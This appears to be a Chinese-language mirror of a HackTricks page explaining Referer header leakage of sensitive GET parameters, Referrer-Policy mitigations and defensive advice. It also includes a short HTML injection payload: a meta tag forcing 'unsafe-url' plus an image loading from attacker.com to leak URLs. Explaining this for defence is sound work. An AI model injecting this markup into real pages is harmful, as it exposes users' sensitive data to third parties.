mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
3.2 KiB
3.2 KiB
从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。**
Referrer头部和策略
Referrer是浏览器用来指示访问者之前访问的页面的头部。
泄露敏感信息
如果在网页的某个地方,任何敏感信息位于GET请求参数中,如果页面包含指向外部资源的链接,或者攻击者能够使/建议(社会工程)用户访问由攻击者控制的URL。攻击者可能能够从最后的GET请求中窃取敏感信息。
缓解措施
您可以使浏览器遵循一个Referrer-policy,该策略可以避免将敏感信息发送到其他网络应用程序:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
反缓解措施
您可以使用HTML元标签覆盖此规则(攻击者需要利用HTML注入):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
永远不要在URL的GET参数或路径中放置任何敏感数据。
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。